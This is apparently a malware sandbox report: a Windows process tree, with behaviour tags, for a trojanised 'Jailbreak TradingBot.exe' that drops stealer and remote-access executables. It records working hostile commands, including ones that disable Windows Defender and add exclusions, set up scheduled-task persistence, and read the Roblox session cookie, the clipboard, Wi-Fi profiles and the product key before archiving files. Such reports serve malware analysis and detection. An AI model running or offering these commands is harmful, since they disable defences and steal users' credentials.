C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:82⤵PID:4200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:12⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:12⤵PID:540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3444 /prefetch:82⤵PID:2172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:2288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6216 /prefetch:82⤵PID:1920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:12⤵PID:1944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:12⤵PID:4528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6632 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5152
-
-
C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"2⤵
- Executes dropped EXE
PID:5260
-
-
C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5320 -
C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:5504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Opperhoofd.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5844
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opperhoofd.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5884
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5604 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5632
-
-
-
-
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"3⤵
- Executes dropped EXE
PID:5588 -
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:5708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"5⤵PID:6056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:6068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:6136
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5368
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵PID:5176
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵PID:5636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵PID:5788
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵PID:5840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5700
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:5596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5220
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:5676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
PID:5252 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"6⤵
- Views/modifies file attributes
PID:5948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:6008
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:6052
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:5108
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:5544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:5216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:220
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5044
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5596
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:5520
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:6140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"5⤵PID:5476
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath6⤵PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5180
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"5⤵PID:5488
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5044
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"5⤵PID:5660
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5780
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:5568
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5664
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5632
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3604"5⤵PID:5516
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36046⤵
- Kills process with taskkill
PID:5668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3604"5⤵PID:5676
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36046⤵
- Kills process with taskkill
PID:6136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 416"5⤵PID:5904
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 4166⤵
- Kills process with taskkill
PID:5560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 416"5⤵PID:6072
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 4166⤵
- Kills process with taskkill
PID:5448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"5⤵PID:5188
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 43886⤵
- Kills process with taskkill
PID:5872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"5⤵PID:5500
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 43886⤵
- Kills process with taskkill
PID:3276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"5⤵PID:5700
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46406⤵
- Kills process with taskkill
PID:5768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"5⤵PID:6024
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46406⤵
- Kills process with taskkill
PID:5160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"5⤵PID:5680
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16846⤵
- Kills process with taskkill
PID:6108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"5⤵PID:5516
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16846⤵
- Kills process with taskkill
PID:5244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"5⤵PID:4648
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24606⤵
- Kills process with taskkill
PID:6040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"5⤵PID:5904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5476
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24606⤵
- Kills process with taskkill
PID:5456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"5⤵PID:5064
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40646⤵
- Kills process with taskkill
PID:5208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"5⤵PID:5872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5308
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40646⤵
- Kills process with taskkill
PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2172"5⤵PID:5564
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21726⤵
- Kills process with taskkill
PID:5764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2172"5⤵PID:6044
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21726⤵
- Kills process with taskkill
PID:5820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1944"5⤵PID:768
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19446⤵
- Kills process with taskkill
PID:5704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1944"5⤵PID:6084
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19446⤵
- Kills process with taskkill
PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4528"5⤵PID:5396
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45286⤵
- Kills process with taskkill
PID:5228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4528"5⤵PID:2852
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45286⤵
- Kills process with taskkill
PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:5224
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:5492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:416
-
C:\Windows\system32\getmac.exegetmac6⤵PID:5236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\mRjyk.zip" *"5⤵PID:2716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\mRjyk.zip" *6⤵
- Executes dropped EXE
PID:5884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:5860
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:4148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:4276
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5400
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:6056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:5288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5128
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:4828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:3136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3936 -
C:\Windows\system32\PING.EXEping localhost -n 36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3892
-
-
-
-
-
-
C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5844 -
C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"3⤵
- Executes dropped EXE
PID:6024 -
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5244
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1808
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1812
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2288
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:5996
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv uoA8EPR7jEGXyNrqurEFYw.0.21⤵PID:6024
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
PID:5156
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3532
-
C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5700 -
C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"2⤵
- Executes dropped EXE
PID:5704
-
-
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"2⤵
- Executes dropped EXE
PID:5680 -
C:\Users\Admin\AppData\Roaming\Built.exe"C:\Users\Admin\AppData\Roaming\Built.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:5304 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"4⤵PID:6052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:5160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5648
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1036
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵PID:4976
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:5448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵PID:5232
-
